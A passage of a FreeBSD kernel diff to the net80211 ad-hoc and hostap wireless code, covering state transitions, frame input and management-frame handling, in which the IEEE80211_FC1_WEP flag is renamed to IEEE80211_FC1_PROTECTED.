IEEE80211_LOCK_ASSERT(vap->iv_ic); ostate = vap->iv_state; IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: %s -> %s (%d)\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate], arg); vap->iv_state = nstate; /* state transition */ if (ostate != IEEE80211_S_SCAN) ieee80211_cancel_scan(vap); /* background scan */ ni = vap->iv_bss; /* NB: no reference held */ switch (nstate) { case IEEE80211_S_INIT: switch (ostate) { case IEEE80211_S_SCAN: ieee80211_cancel_scan(vap); break; default: break; } if (ostate != IEEE80211_S_INIT) { /* NB: optimize INIT -> INIT case */ ieee80211_reset_bss(vap); } break; case IEEE80211_S_SCAN: switch (ostate) { case IEEE80211_S_RUN: /* beacon miss */ /* purge station table; entries are stale */ ieee80211_iterate_nodes(&ic->ic_sta, sta_leave, vap); /* fall thru... 
*/ case IEEE80211_S_INIT: if (vap->iv_des_chan != IEEE80211_CHAN_ANYC && !IEEE80211_IS_CHAN_RADAR(vap->iv_des_chan)) { /* * Already have a channel; bypass the * scan and startup immediately. */ ieee80211_create_ibss(vap, ieee80211_ht_adjust_channel(ic, vap->iv_des_chan, vap->iv_flags_ht)); break; } /* * Initiate a scan. We can come here as a result * of an IEEE80211_IOC_SCAN_REQ too in which case * the vap will be marked with IEEE80211_FEXT_SCANREQ * and the scan request parameters will be present * in iv_scanreq. Otherwise we do the default. */ if (vap->iv_flags_ext & IEEE80211_FEXT_SCANREQ) { ieee80211_check_scan(vap, vap->iv_scanreq_flags, vap->iv_scanreq_duration, vap->iv_scanreq_mindwell, vap->iv_scanreq_maxdwell, vap->iv_scanreq_nssid, vap->iv_scanreq_ssid); vap->iv_flags_ext &= ~IEEE80211_FEXT_SCANREQ; } else ieee80211_check_scan_current(vap); break; case IEEE80211_S_SCAN: /* * This can happen because of a change in state * that requires a reset. Trigger a new scan * unless we're in manual roaming mode in which * case an application must issue an explicit request. */ if (vap->iv_roaming == IEEE80211_ROAMING_AUTO) ieee80211_check_scan_current(vap); break; default: goto invalid; } break; case IEEE80211_S_RUN: if (vap->iv_flags & IEEE80211_F_WPA) { /* XXX validate prerequisites */ } switch (ostate) { case IEEE80211_S_SCAN: #ifdef IEEE80211_DEBUG if (ieee80211_msg_debug(vap)) { ieee80211_note(vap, "synchronized with %s ssid ", ether_sprintf(ni->ni_bssid)); ieee80211_print_essid(vap->iv_bss->ni_essid, ni->ni_esslen); /* XXX MCS/HT */ printf(" channel %d start %uMb\n", ieee80211_chan2ieee(ic, ic->ic_curchan), IEEE80211_RATE2MBS(ni->ni_txrate)); } #endif break; default: goto invalid; } /* * When 802.1x is not in use mark the port authorized * at this point so traffic can flow. */ if (ni->ni_authmode != IEEE80211_AUTH_8021X) ieee80211_node_authorize(ni); /* * Fake association when joining an existing bss. */ if (!IEEE80211_ADDR_EQ(ni->ni_macaddr, vap->iv_myaddr) && ic->ic_newassoc != NULL) ic->ic_newassoc(ni, ostate != IEEE80211_S_RUN); break; case IEEE80211_S_SLEEP: vap->iv_sta_ps(vap, 0); break; default: invalid: IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: unexpected state transition %s -> %s\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate]); break; } return 0; } /* * Decide if a received management frame should be * printed when debugging is enabled. This filters some * of the less interesting frames that come frequently * (e.g. beacons). */ static __inline int doprint(struct ieee80211vap *vap, int subtype) { switch (subtype) { case IEEE80211_FC0_SUBTYPE_BEACON: return (vap->iv_ic->ic_flags & IEEE80211_F_SCAN); case IEEE80211_FC0_SUBTYPE_PROBE_REQ: return 1; } return 1; } /* * Process a received frame. The node associated with the sender * should be supplied. If nothing was found in the node table then * the caller is assumed to supply a reference to iv_bss instead. * The RSSI and a timestamp are also supplied. The RSSI data is used * during AP scanning to select a AP to associate with; it can have * any units so long as values have consistent units and higher values * mean ``better signal''. The receive timestamp is currently not used * by the 802.11 layer. 
*/ static int adhoc_input(struct ieee80211_node *ni, struct mbuf *m, int rssi, int nf) { #define HAS_SEQ(type) ((type & 0x4) == 0) struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = vap->iv_ifp; struct ieee80211_frame *wh; struct ieee80211_key *key; struct ether_header *eh; int hdrspace, need_tap = 1; /* mbuf need to be tapped. */ uint8_t dir, type, subtype, qos; uint8_t *bssid; uint16_t rxseq; if (m->m_flags & M_AMPDU_MPDU) { /* * Fastpath for A-MPDU reorder q resubmission. Frames * w/ M_AMPDU_MPDU marked have already passed through * here but were received out of order and been held on * the reorder queue. When resubmitted they are marked * with the M_AMPDU_MPDU flag and we can bypass most of * the normal processing. */ wh = mtod(m, struct ieee80211_frame *); type = IEEE80211_FC0_TYPE_DATA; dir = wh->i_fc[1] & IEEE80211_FC1_DIR_MASK; subtype = IEEE80211_FC0_SUBTYPE_QOS; hdrspace = ieee80211_hdrspace(ic, wh); /* XXX optimize? */ goto resubmit_ampdu; } KASSERT(ni != NULL, ("null node")); ni->ni_inact = ni->ni_inact_reload; type = -1; /* undefined */ if (m->m_pkthdr.len < sizeof(struct ieee80211_frame_min)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "too short (1): len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } /* * Bit of a cheat here, we use a pointer for a 3-address * frame format but don't reference fields past outside * ieee80211_frame_min w/o first validating the data is * present. */ wh = mtod(m, struct ieee80211_frame *); if ((wh->i_fc[0] & IEEE80211_FC0_VERSION_MASK) != IEEE80211_FC0_VERSION_0) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "wrong version, fc %02x:%02x", wh->i_fc[0], wh->i_fc[1]); vap->iv_stats.is_rx_badversion++; goto err; } dir = wh->i_fc[1] & IEEE80211_FC1_DIR_MASK; type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; if ((ic->ic_flags & IEEE80211_F_SCAN) == 0) { if (dir != IEEE80211_FC1_DIR_NODS) bssid = wh->i_addr1; else if (type == IEEE80211_FC0_TYPE_CTL) bssid = wh->i_addr1; else { if (m->m_pkthdr.len < sizeof(struct ieee80211_frame)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "too short (2): len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } bssid = wh->i_addr3; } /* * Validate the bssid. */ if (!IEEE80211_ADDR_EQ(bssid, vap->iv_bss->ni_bssid) && !IEEE80211_ADDR_EQ(bssid, ifp->if_broadcastaddr)) { /* not interested in */ IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, bssid, NULL, "%s", "not to bss"); vap->iv_stats.is_rx_wrongbss++; goto out; } /* * Data frame, cons up a node when it doesn't * exist. This should probably done after an ACL check. */ if (type == IEEE80211_FC0_TYPE_DATA && ni == vap->iv_bss && !IEEE80211_ADDR_EQ(wh->i_addr2, ni->ni_macaddr)) { /* * Beware of frames that come in too early; we * can receive broadcast frames and creating sta * entries will blow up because there is no bss * channel yet. */ if (vap->iv_state != IEEE80211_S_RUN) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "not in RUN state (%s)", ieee80211_state_name[vap->iv_state]); vap->iv_stats.is_rx_badstate++; goto err; } /* * Fake up a node for this newly * discovered member of the IBSS. 
*/ ni = ieee80211_fakeup_adhoc_node(vap, wh->i_addr2); if (ni == NULL) { /* NB: stat kept for alloc failure */ goto err; } } IEEE80211_RSSI_LPF(ni->ni_avgrssi, rssi); ni->ni_noise = nf; if (HAS_SEQ(type)) { uint8_t tid = ieee80211_gettid(wh); if (IEEE80211_QOS_HAS_SEQ(wh) && TID_TO_WME_AC(tid) >= WME_AC_VI) ic->ic_wme.wme_hipri_traffic++; rxseq = le16toh(*(uint16_t *)wh->i_seq); if (! ieee80211_check_rxseq(ni, wh)) { /* duplicate, discard */ IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, bssid, "duplicate", "seqno <%u,%u> fragno <%u,%u> tid %u", rxseq >> IEEE80211_SEQ_SEQ_SHIFT, ni->ni_rxseqs[tid] >> IEEE80211_SEQ_SEQ_SHIFT, rxseq & IEEE80211_SEQ_FRAG_MASK, ni->ni_rxseqs[tid] & IEEE80211_SEQ_FRAG_MASK, tid); vap->iv_stats.is_rx_dup++; IEEE80211_NODE_STAT(ni, rx_dup); goto out; } ni->ni_rxseqs[tid] = rxseq; } } switch (type) { case IEEE80211_FC0_TYPE_DATA: hdrspace = ieee80211_hdrspace(ic, wh); if (m->m_len < hdrspace && (m = m_pullup(m, hdrspace)) == NULL) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "data too short: expecting %u", hdrspace); vap->iv_stats.is_rx_tooshort++; goto out; /* XXX */ } if (dir != IEEE80211_FC1_DIR_NODS) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "incorrect dir 0x%x", dir); vap->iv_stats.is_rx_wrongdir++; goto out; } /* XXX no power-save support */ /* * Handle A-MPDU re-ordering. If the frame is to be * processed directly then ieee80211_ampdu_reorder * will return 0; otherwise it has consumed the mbuf * and we should do nothing more with it. */ if ((m->m_flags & M_AMPDU) && ieee80211_ampdu_reorder(ni, m) != 0) { m = NULL; goto out; } resubmit_ampdu: /* * Handle privacy requirements. Note that we * must not be preempted from here until after * we (potentially) call ieee80211_crypto_demic; * otherwise we may violate assumptions in the * crypto cipher modules used to do delayed update * of replay sequence numbers. */ - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { if ((vap->iv_flags & IEEE80211_F_PRIVACY) == 0) { /* * Discard encrypted frames when privacy is off. */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "WEP", "%s", "PRIVACY off"); vap->iv_stats.is_rx_noprivacy++; IEEE80211_NODE_STAT(ni, rx_noprivacy); goto out; } key = ieee80211_crypto_decap(ni, m, hdrspace); if (key == NULL) { /* NB: stats+msgs handled in crypto_decap */ IEEE80211_NODE_STAT(ni, rx_wepfail); goto out; } wh = mtod(m, struct ieee80211_frame *); - wh->i_fc[1] &= ~IEEE80211_FC1_WEP; + wh->i_fc[1] &= ~IEEE80211_FC1_PROTECTED; } else { /* XXX M_WEP and IEEE80211_F_PRIVACY */ key = NULL; } /* * Save QoS bits for use below--before we strip the header. */ if (subtype == IEEE80211_FC0_SUBTYPE_QOS) { qos = (dir == IEEE80211_FC1_DIR_DSTODS) ? ((struct ieee80211_qosframe_addr4 *)wh)->i_qos[0] : ((struct ieee80211_qosframe *)wh)->i_qos[0]; } else qos = 0; /* * Next up, any fragmentation. */ if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { m = ieee80211_defrag(ni, m, hdrspace); if (m == NULL) { /* Fragment dropped or frame not complete yet */ goto out; } } wh = NULL; /* no longer valid, catch any uses */ /* * Next strip any MSDU crypto bits. 
*/ if (key != NULL && !ieee80211_crypto_demic(vap, key, m, 0)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, ni->ni_macaddr, "data", "%s", "demic error"); vap->iv_stats.is_rx_demicfail++; IEEE80211_NODE_STAT(ni, rx_demicfail); goto out; } /* copy to listener after decrypt */ if (ieee80211_radiotap_active_vap(vap)) ieee80211_radiotap_rx(vap, m); need_tap = 0; /* * Finally, strip the 802.11 header. */ m = ieee80211_decap(vap, m, hdrspace); if (m == NULL) { /* XXX mask bit to check for both */ /* don't count Null data frames as errors */ if (subtype == IEEE80211_FC0_SUBTYPE_NODATA || subtype == IEEE80211_FC0_SUBTYPE_QOS_NULL) goto out; IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, ni->ni_macaddr, "data", "%s", "decap error"); vap->iv_stats.is_rx_decap++; IEEE80211_NODE_STAT(ni, rx_decap); goto err; } eh = mtod(m, struct ether_header *); if (!ieee80211_node_is_authorized(ni)) { /* * Deny any non-PAE frames received prior to * authorization. For open/shared-key * authentication the port is mark authorized * after authentication completes. For 802.1x * the port is not marked authorized by the * authenticator until the handshake has completed. */ if (eh->ether_type != htons(ETHERTYPE_PAE)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, eh->ether_shost, "data", "unauthorized port: ether type 0x%x len %u", eh->ether_type, m->m_pkthdr.len); vap->iv_stats.is_rx_unauth++; IEEE80211_NODE_STAT(ni, rx_unauth); goto err; } } else { /* * When denying unencrypted frames, discard * any non-PAE frames received without encryption. */ if ((vap->iv_flags & IEEE80211_F_DROPUNENC) && (key == NULL && (m->m_flags & M_WEP) == 0) && eh->ether_type != htons(ETHERTYPE_PAE)) { /* * Drop unencrypted frames. */ vap->iv_stats.is_rx_unencrypted++; IEEE80211_NODE_STAT(ni, rx_unencrypted); goto out; } } /* XXX require HT? 
*/ if (qos & IEEE80211_QOS_AMSDU) { m = ieee80211_decap_amsdu(ni, m); if (m == NULL) return IEEE80211_FC0_TYPE_DATA; } else { #ifdef IEEE80211_SUPPORT_SUPERG m = ieee80211_decap_fastframe(vap, ni, m); if (m == NULL) return IEEE80211_FC0_TYPE_DATA; #endif } if (dir == IEEE80211_FC1_DIR_DSTODS && ni->ni_wdsvap != NULL) ieee80211_deliver_data(ni->ni_wdsvap, ni, m); else ieee80211_deliver_data(vap, ni, m); return IEEE80211_FC0_TYPE_DATA; case IEEE80211_FC0_TYPE_MGT: vap->iv_stats.is_rx_mgmt++; IEEE80211_NODE_STAT(ni, rx_mgmt); if (dir != IEEE80211_FC1_DIR_NODS) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "incorrect dir 0x%x", dir); vap->iv_stats.is_rx_wrongdir++; goto err; } if (m->m_pkthdr.len < sizeof(struct ieee80211_frame)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, "mgt", "too short: len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } #ifdef IEEE80211_DEBUG if ((ieee80211_msg_debug(vap) && doprint(vap, subtype)) || ieee80211_msg_dumppkts(vap)) { if_printf(ifp, "received %s from %s rssi %d\n", ieee80211_mgt_subtype_name[subtype >> IEEE80211_FC0_SUBTYPE_SHIFT], ether_sprintf(wh->i_addr2), rssi); } #endif - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "WEP set but not permitted"); vap->iv_stats.is_rx_mgtdiscard++; /* XXX */ goto out; } vap->iv_recv_mgmt(ni, m, subtype, rssi, nf); goto out; case IEEE80211_FC0_TYPE_CTL: vap->iv_stats.is_rx_ctl++; IEEE80211_NODE_STAT(ni, rx_ctrl); vap->iv_recv_ctl(ni, m, subtype); goto out; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, "bad", "frame type 0x%x", type); /* should not come here */ break; } err: ifp->if_ierrors++; out: if (m != NULL) { if (need_tap && ieee80211_radiotap_active_vap(vap)) ieee80211_radiotap_rx(vap, m); m_freem(m); } return type; } static int is11bclient(const uint8_t *rates, const uint8_t *xrates) { static const uint32_t brates = (1<<2*1)|(1<<2*2)|(1<<11)|(1<<2*11); int i; /* NB: the 11b clients we care about will not have xrates */ if (xrates != NULL || rates == NULL) return 0; for (i = 0; i < rates[1]; i++) { int r = rates[2+i] & IEEE80211_RATE_VAL; if (r > 2*11 || ((1<ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_frame *wh; uint8_t *frm, *efrm, *sfrm; uint8_t *ssid, *rates, *xrates; #if 0 int ht_state_change = 0; #endif wh = mtod(m0, struct ieee80211_frame *); frm = (uint8_t *)&wh[1]; efrm = mtod(m0, uint8_t *) + m0->m_len; switch (subtype) { case IEEE80211_FC0_SUBTYPE_PROBE_RESP: case IEEE80211_FC0_SUBTYPE_BEACON: { struct ieee80211_scanparams scan; /* * We process beacon/probe response * frames to discover neighbors. */ if (ieee80211_parse_beacon(ni, m0, &scan) != 0) return; /* * Count frame now that we know it's to be processed. */ if (subtype == IEEE80211_FC0_SUBTYPE_BEACON) { vap->iv_stats.is_rx_beacon++; /* XXX remove */ IEEE80211_NODE_STAT(ni, rx_beacons); } else IEEE80211_NODE_STAT(ni, rx_proberesp); /* * If scanning, just pass information to the scan module. */ if (ic->ic_flags & IEEE80211_F_SCAN) { if (ic->ic_flags_ext & IEEE80211_FEXT_PROBECHAN) { /* * Actively scanning a channel marked passive; * send a probe request now that we know there * is 802.11 traffic present. 
* * XXX check if the beacon we recv'd gives * us what we need and suppress the probe req */ ieee80211_probe_curchan(vap, 1); ic->ic_flags_ext &= ~IEEE80211_FEXT_PROBECHAN; } ieee80211_add_scan(vap, &scan, wh, subtype, rssi, nf); return; } if (scan.capinfo & IEEE80211_CAPINFO_IBSS) { if (!IEEE80211_ADDR_EQ(wh->i_addr2, ni->ni_macaddr)) { /* * Create a new entry in the neighbor table. */ ni = ieee80211_add_neighbor(vap, wh, &scan); } else if (ni->ni_capinfo == 0) { /* * Update faked node created on transmit. * Note this also updates the tsf. */ ieee80211_init_neighbor(ni, wh, &scan); } else { /* * Record tsf for potential resync. */ memcpy(ni->ni_tstamp.data, scan.tstamp, sizeof(ni->ni_tstamp)); } /* * This isn't enabled yet - otherwise it would * update the HT parameters and channel width * from any node, which could lead to lots of * strange behaviour if the 11n nodes aren't * exactly configured to match. */ #if 0 if (scan.htcap != NULL && scan.htinfo != NULL && (vap->iv_flags_ht & IEEE80211_FHT_HT)) { if (ieee80211_ht_updateparams(ni, scan.htcap, scan.htinfo)) ht_state_change = 1; } #endif if (ni != NULL) { IEEE80211_RSSI_LPF(ni->ni_avgrssi, rssi); ni->ni_noise = nf; } /* * Same here - the channel width change should * be applied to the specific peer node, not * to the ic. Ie, the interface configuration * should stay in its current channel width; * but it should change the rate control and * any queued frames for the given node only. * * Since there's no (current) way to inform * the driver that a channel width change has * occured for a single node, just stub this * out. */ #if 0 if (ht_state_change) ieee80211_update_chw(ic); #endif } break; } case IEEE80211_FC0_SUBTYPE_PROBE_REQ: if (vap->iv_state != IEEE80211_S_RUN) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "wrong state %s", ieee80211_state_name[vap->iv_state]); vap->iv_stats.is_rx_mgtdiscard++; return; } if (IEEE80211_IS_MULTICAST(wh->i_addr2)) { /* frame must be directed */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not unicast"); vap->iv_stats.is_rx_mgtdiscard++; /* XXX stat */ return; } /* * prreq frame format * [tlv] ssid * [tlv] supported rates * [tlv] extended supported rates */ ssid = rates = xrates = NULL; sfrm = frm; while (efrm - frm > 1) { IEEE80211_VERIFY_LENGTH(efrm - frm, frm[1] + 2, return); switch (*frm) { case IEEE80211_ELEMID_SSID: ssid = frm; break; case IEEE80211_ELEMID_RATES: rates = frm; break; case IEEE80211_ELEMID_XRATES: xrates = frm; break; } frm += frm[1] + 2; } IEEE80211_VERIFY_ELEMENT(rates, IEEE80211_RATE_MAXSIZE, return); if (xrates != NULL) IEEE80211_VERIFY_ELEMENT(xrates, IEEE80211_RATE_MAXSIZE - rates[1], return); IEEE80211_VERIFY_ELEMENT(ssid, IEEE80211_NWID_LEN, return); IEEE80211_VERIFY_SSID(vap->iv_bss, ssid, return); if ((vap->iv_flags & IEEE80211_F_HIDESSID) && ssid[1] == 0) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "no ssid with ssid suppression enabled"); vap->iv_stats.is_rx_ssidmismatch++; /*XXX*/ return; } /* XXX find a better class or define it's own */ IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_INPUT, wh->i_addr2, "%s", "recv probe req"); /* * Some legacy 11b clients cannot hack a complete * probe response frame. When the request includes * only a bare-bones rate set, communicate this to * the transmit side. */ ieee80211_send_proberesp(vap, wh->i_addr2, is11bclient(rates, xrates) ? 
IEEE80211_SEND_LEGACY_11B : 0); break; case IEEE80211_FC0_SUBTYPE_ACTION: case IEEE80211_FC0_SUBTYPE_ACTION_NOACK: if (ni == vap->iv_bss) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "unknown node"); vap->iv_stats.is_rx_mgtdiscard++; } else if (!IEEE80211_ADDR_EQ(vap->iv_myaddr, wh->i_addr1) && !IEEE80211_IS_MULTICAST(wh->i_addr1)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not for us"); vap->iv_stats.is_rx_mgtdiscard++; } else if (vap->iv_state != IEEE80211_S_RUN) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "wrong state %s", ieee80211_state_name[vap->iv_state]); vap->iv_stats.is_rx_mgtdiscard++; } else { if (ieee80211_parse_action(ni, m0) == 0) (void)ic->ic_recv_action(ni, wh, frm, efrm); } break; case IEEE80211_FC0_SUBTYPE_ASSOC_REQ: case IEEE80211_FC0_SUBTYPE_ASSOC_RESP: case IEEE80211_FC0_SUBTYPE_REASSOC_REQ: case IEEE80211_FC0_SUBTYPE_REASSOC_RESP: case IEEE80211_FC0_SUBTYPE_ATIM: case IEEE80211_FC0_SUBTYPE_DISASSOC: case IEEE80211_FC0_SUBTYPE_AUTH: case IEEE80211_FC0_SUBTYPE_DEAUTH: IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not handled"); vap->iv_stats.is_rx_mgtdiscard++; break; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, "mgt", "subtype 0x%x not handled", subtype); vap->iv_stats.is_rx_badsubtype++; break; } } #undef IEEE80211_VERIFY_LENGTH #undef IEEE80211_VERIFY_ELEMENT static void ahdemo_recv_mgmt(struct ieee80211_node *ni, struct mbuf *m0, int subtype, int rssi, int nf) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_frame *wh; /* * Process management frames when scanning; useful for doing * a site-survey. */ if (ic->ic_flags & IEEE80211_F_SCAN) adhoc_recv_mgmt(ni, m0, subtype, rssi, nf); else { wh = mtod(m0, struct ieee80211_frame *); switch (subtype) { case IEEE80211_FC0_SUBTYPE_ASSOC_REQ: case IEEE80211_FC0_SUBTYPE_ASSOC_RESP: case IEEE80211_FC0_SUBTYPE_REASSOC_REQ: case IEEE80211_FC0_SUBTYPE_REASSOC_RESP: case IEEE80211_FC0_SUBTYPE_PROBE_REQ: case IEEE80211_FC0_SUBTYPE_PROBE_RESP: case IEEE80211_FC0_SUBTYPE_BEACON: case IEEE80211_FC0_SUBTYPE_ATIM: case IEEE80211_FC0_SUBTYPE_DISASSOC: case IEEE80211_FC0_SUBTYPE_AUTH: case IEEE80211_FC0_SUBTYPE_DEAUTH: case IEEE80211_FC0_SUBTYPE_ACTION: case IEEE80211_FC0_SUBTYPE_ACTION_NOACK: IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not handled"); vap->iv_stats.is_rx_mgtdiscard++; break; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, "mgt", "subtype 0x%x not handled", subtype); vap->iv_stats.is_rx_badsubtype++; break; } } } static void adhoc_recv_ctl(struct ieee80211_node *ni, struct mbuf *m, int subtype) { switch (subtype) { case IEEE80211_FC0_SUBTYPE_BAR: ieee80211_recv_bar(ni, m); break; } } diff --git a/sys/net80211/ieee80211_hostap.c b/sys/net80211/ieee80211_hostap.c index 91c58abf35f2..8cb97b04f6a1 100644 --- a/sys/net80211/ieee80211_hostap.c +++ b/sys/net80211/ieee80211_hostap.c @@ -1,2340 +1,2340 @@ /*- * Copyright (c) 2007-2008 Sam Leffler, Errno Consulting * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. 
* * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include #ifdef __FreeBSD__ __FBSDID("$FreeBSD$"); #endif /* * IEEE 802.11 HOSTAP mode support. */ #include "opt_inet.h" #include "opt_wlan.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef IEEE80211_SUPPORT_SUPERG #include #endif #include #define IEEE80211_RATE2MBS(r) (((r) & IEEE80211_RATE_VAL) / 2) static void hostap_vattach(struct ieee80211vap *); static int hostap_newstate(struct ieee80211vap *, enum ieee80211_state, int); static int hostap_input(struct ieee80211_node *ni, struct mbuf *m, int rssi, int nf); static void hostap_deliver_data(struct ieee80211vap *, struct ieee80211_node *, struct mbuf *); static void hostap_recv_mgmt(struct ieee80211_node *, struct mbuf *, int subtype, int rssi, int nf); static void hostap_recv_ctl(struct ieee80211_node *, struct mbuf *, int); void ieee80211_hostap_attach(struct ieee80211com *ic) { ic->ic_vattach[IEEE80211_M_HOSTAP] = hostap_vattach; } void ieee80211_hostap_detach(struct ieee80211com *ic) { } static void hostap_vdetach(struct ieee80211vap *vap) { } static void hostap_vattach(struct ieee80211vap *vap) { vap->iv_newstate = hostap_newstate; vap->iv_input = hostap_input; vap->iv_recv_mgmt = hostap_recv_mgmt; vap->iv_recv_ctl = hostap_recv_ctl; vap->iv_opdetach = hostap_vdetach; vap->iv_deliver_data = hostap_deliver_data; vap->iv_recv_pspoll = ieee80211_recv_pspoll; } static void sta_disassoc(void *arg, struct ieee80211_node *ni) { struct ieee80211vap *vap = arg; if (ni->ni_vap == vap && ni->ni_associd != 0) { IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_DISASSOC, IEEE80211_REASON_ASSOC_LEAVE); ieee80211_node_leave(ni); } } static void sta_csa(void *arg, struct ieee80211_node *ni) { struct ieee80211vap *vap = arg; if (ni->ni_vap == vap && ni->ni_associd != 0) if (ni->ni_inact > vap->iv_inact_init) { ni->ni_inact = vap->iv_inact_init; IEEE80211_NOTE(vap, IEEE80211_MSG_INACT, ni, "%s: inact %u", __func__, ni->ni_inact); } } static void sta_drop(void *arg, struct ieee80211_node *ni) { struct ieee80211vap *vap = arg; if (ni->ni_vap == vap && ni->ni_associd != 0) ieee80211_node_leave(ni); } /* * Does a channel change require associated stations to re-associate * so protocol state is correct. This is used when doing CSA across * bands or similar (e.g. HT -> legacy). */ static int isbandchange(struct ieee80211com *ic) { return ((ic->ic_bsschan->ic_flags ^ ic->ic_csa_newchan->ic_flags) & (IEEE80211_CHAN_2GHZ | IEEE80211_CHAN_5GHZ | IEEE80211_CHAN_HALF | IEEE80211_CHAN_QUARTER | IEEE80211_CHAN_HT)) != 0; } /* * IEEE80211_M_HOSTAP vap state machine handler. 
*/ static int hostap_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ieee80211com *ic = vap->iv_ic; enum ieee80211_state ostate; IEEE80211_LOCK_ASSERT(ic); ostate = vap->iv_state; IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: %s -> %s (%d)\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate], arg); vap->iv_state = nstate; /* state transition */ if (ostate != IEEE80211_S_SCAN) ieee80211_cancel_scan(vap); /* background scan */ switch (nstate) { case IEEE80211_S_INIT: switch (ostate) { case IEEE80211_S_SCAN: ieee80211_cancel_scan(vap); break; case IEEE80211_S_CAC: ieee80211_dfs_cac_stop(vap); break; case IEEE80211_S_RUN: ieee80211_iterate_nodes(&ic->ic_sta, sta_disassoc, vap); break; default: break; } if (ostate != IEEE80211_S_INIT) { /* NB: optimize INIT -> INIT case */ ieee80211_reset_bss(vap); } if (vap->iv_auth->ia_detach != NULL) vap->iv_auth->ia_detach(vap); break; case IEEE80211_S_SCAN: switch (ostate) { case IEEE80211_S_CSA: case IEEE80211_S_RUN: ieee80211_iterate_nodes(&ic->ic_sta, sta_disassoc, vap); /* * Clear overlapping BSS state; the beacon frame * will be reconstructed on transition to the RUN * state and the timeout routines check if the flag * is set before doing anything so this is sufficient. */ ic->ic_flags_ext &= ~IEEE80211_FEXT_NONERP_PR; ic->ic_flags_ht &= ~IEEE80211_FHT_NONHT_PR; /* fall thru... */ case IEEE80211_S_CAC: /* * NB: We may get here because of a manual channel * change in which case we need to stop CAC * XXX no need to stop if ostate RUN but it's ok */ ieee80211_dfs_cac_stop(vap); /* fall thru... */ case IEEE80211_S_INIT: if (vap->iv_des_chan != IEEE80211_CHAN_ANYC && 